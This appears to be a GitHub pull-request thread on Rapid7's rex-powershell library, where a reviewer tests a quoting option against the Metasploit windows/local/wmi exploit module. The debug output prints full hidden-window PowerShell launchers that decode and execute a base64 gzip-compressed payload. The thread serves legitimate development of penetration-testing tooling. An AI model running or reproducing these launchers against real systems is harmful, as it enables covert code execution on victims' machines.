search

rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts
Other
53 stars 35 forks source link

Update use_single_quotes straggler #18

Closed wvu closed 5 years ago

wvu commented 5 years ago

Untested.

https://github.com/rapid7/metasploit-framework/pull/11660

pbarry-r7 commented 5 years ago

I tested with the modules in rapid7/metasploit-framework#11660, using binding.pry just before line 348 of the modified file so I can run the run_hidden_psh() method manually (first with the updated wrap_double_quotes option, then I delete that option and add the use_single_quotes option to see the existing behavior). I've included the output for one of those modules below, the output for the other 3 looked fine as well.

exploits/windows/local/wmi

[1] pry(Rex::Powershell::Command)> p inner_args
{:remove_comspec=>true, :encode_final_payload=>true, :persist=>false, :prepend_sleep=>nil, :exec_in_place=>false, :encode_inner_payload=>false, :noninteractive=>true, :wrap_double_quotes=>true, :no_equals=>false, :method=>"reflection", :shorten=>true}
=> {:remove_comspec=>true,
 :encode_final_payload=>true,
 :persist=>false,
 :prepend_sleep=>nil,
 :exec_in_place=>false,
 :encode_inner_payload=>false,
 :noninteractive=>true,
 :wrap_double_quotes=>true,
 :no_equals=>false,
 :method=>"reflection",
 :shorten=>true}
[2] pry(Rex::Powershell::Command)> p encoded
false
=> false
[3] pry(Rex::Powershell::Command)> run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)
=> "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABYvqVwCA7VW+2+jOBD+uZX6P6BVJEBL89h2t9pKlc7kSRqaB3k2G51cMMSpwSmY5rG3//sNAdqu2t7tnnQoUYw9M575vs/juHFgC8oD6aEZDqTvJ8dHPRxiX1IKd181qcCJrx4dwWxh1a5JV5IyR+t1jfuYBovLy2ochiQQ6XuxSQSKIuLfMUoiRZX+kiZLEpLT7t2K2EL6LhX+LDYZv8MsM9tVsb0k0ikKnGStw22cpFK01owKRf72TVbnp5VFsf4QYxYpsrWLBPGLDmOyKv1Qkw2HuzVRZJPaIY+4K4oTGpx9Ko6CCLvkBqI9EpOIJXciWYUi4BMSEYeBlJST+KerigzDXsht5DghiSJZk+ZJ5Pli8Ycyz7YdxIGgPikagSAhX1skfKQ2iYotHDiMDIi7AC9LhDTwFqoKZo/8niiFIGZMk34njHJDNjlov+qkvHQCq54IVQ1IfF2myZ2YkdRRfiNP4F2FJ+MeUPtxcnxy7OYy8fxq132pExgdzQ9jArkpPR7Rg+GVVNYkE7bBgoc7eC0Mw5ioiydkpcLj8M4daO8HqOTWYOv1Nhym5mNOnQW4ZHQWxLI56CYL7+uyRlwakNouwD61c+kpb6FMXEYOZRZzsxvISpGzBeLUCCMeFglwCdmv3Oo+FU++ekyZQ0JkA1MRZAUkqj8nk3KhyEZgEh9QSt9BfQUXBE9y60zku3z35B2M5CrDUaRJvRhOnK1JFsGMOJqEgohmSygW/DCUn9M1YyaojSORh1uoT0BmG1Z5EIkwtoE5KH5orYlNMUuw0KQWdYi+s6iXbyy/iUQVMwYnASI9AhMwkyBgiUQPIeSYcq8WLSIMf82ID0aHw99g2IOjngn+oCDsEUd+lWMu6VS/CRw5Di8yBI4txoUmjWkooIkk0CZK+o8JvOgfaSrVkGR8KPlJmes7kci7sDvIMkPmgEMoAINGyH0dR+TLedorlA+lLq0ieGZGwExbv6cVtKEVw4TviJ4ZvHbhXLdXrVJY2y5dZESG2erV+q3W+WPbGp8Lq26I654hzPp0tbJQazCaiVsDtYa0fD8736/bdG91kDPblr7s9f2mrG/3K89xZzXX9S5ca1D53KCdSbWvlz/hTq0edyb6Ri+fR3W6afXpqH/fboi72ZjhkVvyppWvmG474Wpc4ebeQKi5PLP3bXfcXJrObtaiZFUqd2gf9RG6tgejUdNbe80Ilb6OH6q+d42Q0cPIQPXxrv2Z6f1RQ0ejut7HXd47+1grVW6dh3rjdorbPnOarVJlNkUO2peG3rJy0VxtBG5Pklioyetj5nAkAmNaKo3p/vah3/RQHXAc+xzhBr0ffZxCvJsh9vTJqPJsi2xzvQ2m8WZzdfUhoRV4LTj7C+sFX+81XBOH0RIz4BFaaX6AGjxsZP2xx2nioSiH6/SehAFhcCHBlZVLEDHG7aQ3p50ULoa0XSe3xwiGZ5/eHKnSk6H63LXzqcvLW0gTVL3rFjsk8MRSK2/PymVoweXteRmK/PXCqny9UyCQljTwAy5pXHaIqyYaLziD/xer7Fwt4cf5V6ye5/5h9ZfwK2tpva+mf574LTh/u/YJpgIsLegNjKQX1DsQZMp4cYk7A+DdzZ7kH1g3Fqc3cLOfHP8NLl09W+kJAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[4] pry(Rex::Powershell::Command)> inner_args.delete(:wrap_double_quotes)
=> false
[5] pry(Rex::Powershell::Command)> inner_args[:use_single_quotes]=true
=> true
[6] pry(Rex::Powershell::Command)> p inner_args
{:remove_comspec=>true, :encode_final_payload=>true, :persist=>false, :prepend_sleep=>nil, :exec_in_place=>false, :encode_inner_payload=>false, :noninteractive=>true, :no_equals=>false, :method=>"reflection", :shorten=>true, :noprofile=>"true", :windowstyle=>"hidden", :command=>"&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABYvqVwCA7VW+2+jOBD+uZX6P6BVJEBL89h2t9pKlc7kSRqaB3k2G51cMMSpwSmY5rG3//sNAdqu2t7tnnQoUYw9M575vs/juHFgC8oD6aEZDqTvJ8dHPRxiX1IKd181qcCJrx4dwWxh1a5JV5IyR+t1jfuYBovLy2ochiQQ6XuxSQSKIuLfMUoiRZX+kiZLEpLT7t2K2EL6LhX+LDYZv8MsM9tVsb0k0ikKnGStw22cpFK01owKRf72TVbnp5VFsf4QYxYpsrWLBPGLDmOyKv1Qkw2HuzVRZJPaIY+4K4oTGpx9Ko6CCLvkBqI9EpOIJXciWYUi4BMSEYeBlJST+KerigzDXsht5DghiSJZk+ZJ5Pli8Ycyz7YdxIGgPikagSAhX1skfKQ2iYotHDiMDIi7AC9LhDTwFqoKZo/8niiFIGZMk34njHJDNjlov+qkvHQCq54IVQ1IfF2myZ2YkdRRfiNP4F2FJ+MeUPtxcnxy7OYy8fxq132pExgdzQ9jArkpPR7Rg+GVVNYkE7bBgoc7eC0Mw5ioiydkpcLj8M4daO8HqOTWYOv1Nhym5mNOnQW4ZHQWxLI56CYL7+uyRlwakNouwD61c+kpb6FMXEYOZRZzsxvISpGzBeLUCCMeFglwCdmv3Oo+FU++ekyZQ0JkA1MRZAUkqj8nk3KhyEZgEh9QSt9BfQUXBE9y60zku3z35B2M5CrDUaRJvRhOnK1JFsGMOJqEgohmSygW/DCUn9M1YyaojSORh1uoT0BmG1Z5EIkwtoE5KH5orYlNMUuw0KQWdYi+s6iXbyy/iUQVMwYnASI9AhMwkyBgiUQPIeSYcq8WLSIMf82ID0aHw99g2IOjngn+oCDsEUd+lWMu6VS/CRw5Di8yBI4txoUmjWkooIkk0CZK+o8JvOgfaSrVkGR8KPlJmes7kci7sDvIMkPmgEMoAINGyH0dR+TLedorlA+lLq0ieGZGwExbv6cVtKEVw4TviJ4ZvHbhXLdXrVJY2y5dZESG2erV+q3W+WPbGp8Lq26I654hzPp0tbJQazCaiVsDtYa0fD8736/bdG91kDPblr7s9f2mrG/3K89xZzXX9S5ca1D53KCdSbWvlz/hTq0edyb6Ri+fR3W6afXpqH/fboi72ZjhkVvyppWvmG474Wpc4ebeQKi5PLP3bXfcXJrObtaiZFUqd2gf9RG6tgejUdNbe80Ilb6OH6q+d42Q0cPIQPXxrv2Z6f1RQ0ejut7HXd47+1grVW6dh3rjdorbPnOarVJlNkUO2peG3rJy0VxtBG5Pklioyetj5nAkAmNaKo3p/vah3/RQHXAc+xzhBr0ffZxCvJsh9vTJqPJsi2xzvQ2m8WZzdfUhoRV4LTj7C+sFX+81XBOH0RIz4BFaaX6AGjxsZP2xx2nioSiH6/SehAFhcCHBlZVLEDHG7aQ3p50ULoa0XSe3xwiGZ5/eHKnSk6H63LXzqcvLW0gTVL3rFjsk8MRSK2/PymVoweXteRmK/PXCqny9UyCQljTwAy5pXHaIqyYaLziD/xer7Fwt4cf5V6ye5/5h9ZfwK2tpva+mf574LTh/u/YJpgIsLegNjKQX1DsQZMp4cYk7A+DdzZ7kH1g3Fqc3cLOfHP8NLl09W+kJAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", :use_single_quotes=>true}
=> {:remove_comspec=>true,
 :encode_final_payload=>true,
 :persist=>false,
 :prepend_sleep=>nil,
 :exec_in_place=>false,
 :encode_inner_payload=>false,
 :noninteractive=>true,
 :no_equals=>false,
 :method=>"reflection",
 :shorten=>true,
 :noprofile=>"true",
 :windowstyle=>"hidden",
 :command=>
  "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABYvqVwCA7VW+2+jOBD+uZX6P6BVJEBL89h2t9pKlc7kSRqaB3k2G51cMMSpwSmY5rG3//sNAdqu2t7tnnQoUYw9M575vs/juHFgC8oD6aEZDqTvJ8dHPRxiX1IKd181qcCJrx4dwWxh1a5JV5IyR+t1jfuYBovLy2ochiQQ6XuxSQSKIuLfMUoiRZX+kiZLEpLT7t2K2EL6LhX+LDYZv8MsM9tVsb0k0ikKnGStw22cpFK01owKRf72TVbnp5VFsf4QYxYpsrWLBPGLDmOyKv1Qkw2HuzVRZJPaIY+4K4oTGpx9Ko6CCLvkBqI9EpOIJXciWYUi4BMSEYeBlJST+KerigzDXsht5DghiSJZk+ZJ5Pli8Ycyz7YdxIGgPikagSAhX1skfKQ2iYotHDiMDIi7AC9LhDTwFqoKZo/8niiFIGZMk34njHJDNjlov+qkvHQCq54IVQ1IfF2myZ2YkdRRfiNP4F2FJ+MeUPtxcnxy7OYy8fxq132pExgdzQ9jArkpPR7Rg+GVVNYkE7bBgoc7eC0Mw5ioiydkpcLj8M4daO8HqOTWYOv1Nhym5mNOnQW4ZHQWxLI56CYL7+uyRlwakNouwD61c+kpb6FMXEYOZRZzsxvISpGzBeLUCCMeFglwCdmv3Oo+FU++ekyZQ0JkA1MRZAUkqj8nk3KhyEZgEh9QSt9BfQUXBE9y60zku3z35B2M5CrDUaRJvRhOnK1JFsGMOJqEgohmSygW/DCUn9M1YyaojSORh1uoT0BmG1Z5EIkwtoE5KH5orYlNMUuw0KQWdYi+s6iXbyy/iUQVMwYnASI9AhMwkyBgiUQPIeSYcq8WLSIMf82ID0aHw99g2IOjngn+oCDsEUd+lWMu6VS/CRw5Di8yBI4txoUmjWkooIkk0CZK+o8JvOgfaSrVkGR8KPlJmes7kci7sDvIMkPmgEMoAINGyH0dR+TLedorlA+lLq0ieGZGwExbv6cVtKEVw4TviJ4ZvHbhXLdXrVJY2y5dZESG2erV+q3W+WPbGp8Lq26I654hzPp0tbJQazCaiVsDtYa0fD8736/bdG91kDPblr7s9f2mrG/3K89xZzXX9S5ca1D53KCdSbWvlz/hTq0edyb6Ri+fR3W6afXpqH/fboi72ZjhkVvyppWvmG474Wpc4ebeQKi5PLP3bXfcXJrObtaiZFUqd2gf9RG6tgejUdNbe80Ilb6OH6q+d42Q0cPIQPXxrv2Z6f1RQ0ejut7HXd47+1grVW6dh3rjdorbPnOarVJlNkUO2peG3rJy0VxtBG5Pklioyetj5nAkAmNaKo3p/vah3/RQHXAc+xzhBr0ffZxCvJsh9vTJqPJsi2xzvQ2m8WZzdfUhoRV4LTj7C+sFX+81XBOH0RIz4BFaaX6AGjxsZP2xx2nioSiH6/SehAFhcCHBlZVLEDHG7aQ3p50ULoa0XSe3xwiGZ5/eHKnSk6H63LXzqcvLW0gTVL3rFjsk8MRSK2/PymVoweXteRmK/PXCqny9UyCQljTwAy5pXHaIqyYaLziD/xer7Fwt4cf5V6ye5/5h9ZfwK2tpva+mf574LTh/u/YJpgIsLegNjKQX1DsQZMp4cYk7A+DdzZ7kH1g3Fqc3cLOfHP8NLl09W+kJAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",
 :use_single_quotes=>true}
[7] pry(Rex::Powershell::Command)> run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)
=> "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABYvqVwCA7VW+2+jOBD+uZX6P6BVJEBL89h2t9pKlc7kSRqaB3k2G51cMMSpwSmY5rG3//sNAdqu2t7tnnQoUYw9M575vs/juHFgC8oD6aEZDqTvJ8dHPRxiX1IKd181qcCJrx4dwWxh1a5JV5IyR+t1jfuYBovLy2ochiQQ6XuxSQSKIuLfMUoiRZX+kiZLEpLT7t2K2EL6LhX+LDYZv8MsM9tVsb0k0ikKnGStw22cpFK01owKRf72TVbnp5VFsf4QYxYpsrWLBPGLDmOyKv1Qkw2HuzVRZJPaIY+4K4oTGpx9Ko6CCLvkBqI9EpOIJXciWYUi4BMSEYeBlJST+KerigzDXsht5DghiSJZk+ZJ5Pli8Ycyz7YdxIGgPikagSAhX1skfKQ2iYotHDiMDIi7AC9LhDTwFqoKZo/8niiFIGZMk34njHJDNjlov+qkvHQCq54IVQ1IfF2myZ2YkdRRfiNP4F2FJ+MeUPtxcnxy7OYy8fxq132pExgdzQ9jArkpPR7Rg+GVVNYkE7bBgoc7eC0Mw5ioiydkpcLj8M4daO8HqOTWYOv1Nhym5mNOnQW4ZHQWxLI56CYL7+uyRlwakNouwD61c+kpb6FMXEYOZRZzsxvISpGzBeLUCCMeFglwCdmv3Oo+FU++ekyZQ0JkA1MRZAUkqj8nk3KhyEZgEh9QSt9BfQUXBE9y60zku3z35B2M5CrDUaRJvRhOnK1JFsGMOJqEgohmSygW/DCUn9M1YyaojSORh1uoT0BmG1Z5EIkwtoE5KH5orYlNMUuw0KQWdYi+s6iXbyy/iUQVMwYnASI9AhMwkyBgiUQPIeSYcq8WLSIMf82ID0aHw99g2IOjngn+oCDsEUd+lWMu6VS/CRw5Di8yBI4txoUmjWkooIkk0CZK+o8JvOgfaSrVkGR8KPlJmes7kci7sDvIMkPmgEMoAINGyH0dR+TLedorlA+lLq0ieGZGwExbv6cVtKEVw4TviJ4ZvHbhXLdXrVJY2y5dZESG2erV+q3W+WPbGp8Lq26I654hzPp0tbJQazCaiVsDtYa0fD8736/bdG91kDPblr7s9f2mrG/3K89xZzXX9S5ca1D53KCdSbWvlz/hTq0edyb6Ri+fR3W6afXpqH/fboi72ZjhkVvyppWvmG474Wpc4ebeQKi5PLP3bXfcXJrObtaiZFUqd2gf9RG6tgejUdNbe80Ilb6OH6q+d42Q0cPIQPXxrv2Z6f1RQ0ejut7HXd47+1grVW6dh3rjdorbPnOarVJlNkUO2peG3rJy0VxtBG5Pklioyetj5nAkAmNaKo3p/vah3/RQHXAc+xzhBr0ffZxCvJsh9vTJqPJsi2xzvQ2m8WZzdfUhoRV4LTj7C+sFX+81XBOH0RIz4BFaaX6AGjxsZP2xx2nioSiH6/SehAFhcCHBlZVLEDHG7aQ3p50ULoa0XSe3xwiGZ5/eHKnSk6H63LXzqcvLW0gTVL3rFjsk8MRSK2/PymVoweXteRmK/PXCqny9UyCQljTwAy5pXHaIqyYaLziD/xer7Fwt4cf5V6ye5/5h9ZfwK2tpva+mf574LTh/u/YJpgIsLegNjKQX1DsQZMp4cYk7A+DdzZ7kH1g3Fqc3cLOfHP8NLl09W+kJAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
pbarry-r7 commented 5 years ago

Welp, landed this without the usual 'Land #XXX' because I'm an idiot and fingers did the wrong thing... :/ But it's landed!